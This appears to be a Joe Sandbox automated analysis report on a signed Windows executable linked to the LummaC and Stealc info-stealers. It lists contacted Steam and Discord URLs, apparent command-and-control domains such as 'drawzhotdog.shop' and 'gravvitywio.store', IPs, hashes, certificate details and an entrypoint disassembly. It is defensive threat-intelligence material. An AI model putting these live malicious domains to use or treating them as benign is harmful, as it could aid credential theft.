                                                                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/useBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://discord.com/api/v9//sticker-packsBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://store.steampowered.com/;BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://store.steampowered.com/about/BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://discord.com/api/v9/oauth2/applicationsBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://drawzhotdog.shop/apiBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://reinforcenh.shop/apiiBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://help.steampowered.com/en/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://steamcommunity.com/market/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://store.steampowered.com/news/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://community.akamai.steamstatic.com/BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZKBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://discord.com/api/v9/gatewayBW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                http://repository.certum.pl/cevcsca2021.cer0BW4pTs1x3V.exefalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://offensivedzvju.shop/BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://cdn.discordapp.com/splashes/BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://store.steampowered.com/stats/BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://medal.tvBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown

                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public IPs

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        104.102.49.254
                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                        172.67.209.193
                                                                                                                                                        		gravvitywio.storeUnited States
                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                        172.67.188.210
                                                                                                                                                        		dividenntykw.shopUnited States
                                                                                                                                                        		13335CLOUDFLARENETUStrue

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                        Analysis ID:1524036
                                                                                                                                                        Start date and time:2024-10-02 14:53:44 +02:00
                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 5m 32s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                        Number of analysed new started processes analysed:8
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Sample name:BW4pTs1x3V.exe
                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                        Original Sample Name:2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509.exe
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal93.troj.evad.winEXE@3/0@11/3
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                        HCA Information:Failed
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                        Warnings

                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                        • Execution Graph export aborted for target BW4pTs1x3V.exe, PID 1668 because there are no executed function
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                        • VT rate limit hit for: BW4pTs1x3V.exe

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        08:55:27API Interceptor5x Sleep call for process: BitLockerToGo.exe modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                                                                        172.67.209.193file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                          Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            https://finalstepgetshere.com/uploads/beta111.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                gravvitywio.storefile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                https://finalstepgetshere.com/uploads/beta111.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                steamcommunity.comfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                https://finalstepgetshere.com/uploads/beta111.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                ASNs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.140.92
                                                                                                                                                                l5pPoBu9i3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.74.221
                                                                                                                                                                caZq8MavwF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                http://freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.26.11.241
                                                                                                                                                                72LZTFDM58.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                https://app.glorify.com/file/1193241?format=90Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 172.67.181.150
                                                                                                                                                                ODzRw7AnvO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.21.67.172
                                                                                                                                                                AKAMAI-ASUSfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                eEu5xPVQUo.exeGet hashmaliciousRhysidaBrowse
                                                                                                                                                                • 96.17.64.189
                                                                                                                                                                62-3590.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 96.17.64.189
                                                                                                                                                                DV2mrnfX2d.exeGet hashmaliciousRhysidaBrowse
                                                                                                                                                                • 23.56.162.185
                                                                                                                                                                eEu5xPVQUo.exeGet hashmaliciousRhysidaBrowse
                                                                                                                                                                • 96.17.64.189
                                                                                                                                                                Axactor Microsoft - Introduksjonsm#U00f8te.msgGet hashmaliciousEvilProxyBrowse
                                                                                                                                                                • 2.19.126.151
                                                                                                                                                                Axactor Microsoft - Introduksjonsm#U00f8te.msgGet hashmaliciousEvilProxyBrowse
                                                                                                                                                                • 104.102.21.248
                                                                                                                                                                563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.118.8.10
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.140.92
                                                                                                                                                                l5pPoBu9i3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.74.221
                                                                                                                                                                caZq8MavwF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                http://freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.26.11.241
                                                                                                                                                                72LZTFDM58.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                https://app.glorify.com/file/1193241?format=90Get hashmaliciousUnknownBrowse
                                                                                                                                                                • 188.114.96.3
                                                                                                                                                                SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 172.67.181.150
                                                                                                                                                                ODzRw7AnvO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.21.67.172

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                FA_41_09_2024_.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                • 172.67.188.210

                                                                                                                                                                Dropped Files

                                                                                                                                                                No context

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                No created / dropped files found

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                Entropy (8bit):5.755978701725458
                                                                                                                                                                TrID:
                                                                                                                                                                • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                File name:BW4pTs1x3V.exe
                                                                                                                                                                File size:13'565'176 bytes
                                                                                                                                                                MD5:3677ebc159e92251f19020e9ab4b62ad
                                                                                                                                                                SHA1:561483bb3f3ae9d384d21670f184a7c3fc9cf9c5
                                                                                                                                                                SHA256:2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509
                                                                                                                                                                SHA512:1daa3a77bc77b422678fdb65362d1dde1d8f1cce20b68a25b84c79a11abc7e06e8cebf98a7cb0f957f612b6047c9e76c53e18f458288d633efcb35dcd0a718a6
                                                                                                                                                                SSDEEP:98304:IdYu0vXx5GmAxBvSmSSxBREz5A1XVafXFP+JgIX:IdmXx5GmSkm7xByz5wRJgIX
                                                                                                                                                                TLSH:A6D62843E8A149E4C19AD13489369616BA60BC5C8B3037D72B64F7693F36FC0AE7C758
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..S....................@.............................`.......q....`... ............................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:72d280daeaea9282

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x1400014c0
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:true
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                TLS Callbacks:0x40533f00, 0x1, 0x40533ed0, 0x1, 0x40537970, 0x1
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:1
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                Import Hash:4a438adb9d59c004dab9ec35016a1405

                                                                                                                                                                Authenticode Signature

                                                                                                                                                                Signature Valid:true
                                                                                                                                                                Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                Error Number:0
                                                                                                                                                                Not Before, Not After
                                                                                                                                                                • 09/09/2024 05:06:13 09/09/2025 05:06:12
                                                                                                                                                                Subject Chain
                                                                                                                                                                • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                                                                                                Version:3
                                                                                                                                                                Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                                                                                                                                                Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                                                                                                                                                Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                                                                                                                                                Serial:332576FE101609502C23F70055B4A3BE

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [00C7E4B5h]
                                                                                                                                                                mov dword ptr [eax], 00000001h
                                                                                                                                                                call 00007F9C91274F3Fh
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                dec eax
                                                                                                                                                                mov eax, dword ptr [00C7E495h]
                                                                                                                                                                mov dword ptr [eax], 00000000h
                                                                                                                                                                call 00007F9C91274F1Fh
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop dword ptr [eax]
                                                                                                                                                                dec eax
                                                                                                                                                                sub esp, 28h
                                                                                                                                                                call 00007F9C917B2A5Ch
                                                                                                                                                                dec eax
                                                                                                                                                                test eax, eax
                                                                                                                                                                sete al
                                                                                                                                                                movzx eax, al
                                                                                                                                                                neg eax
                                                                                                                                                                dec eax
                                                                                                                                                                add esp, 28h
                                                                                                                                                                ret
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                dec eax
                                                                                                                                                                lea ecx, dword ptr [00000009h]
                                                                                                                                                                jmp 00007F9C91275259h
                                                                                                                                                                nop dword ptr [eax+00h]
                                                                                                                                                                ret
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                nop
                                                                                                                                                                jmp dword ptr [eax]
                                                                                                                                                                inc edi
                                                                                                                                                                outsd
                                                                                                                                                                and byte ptr [edx+75h], ah
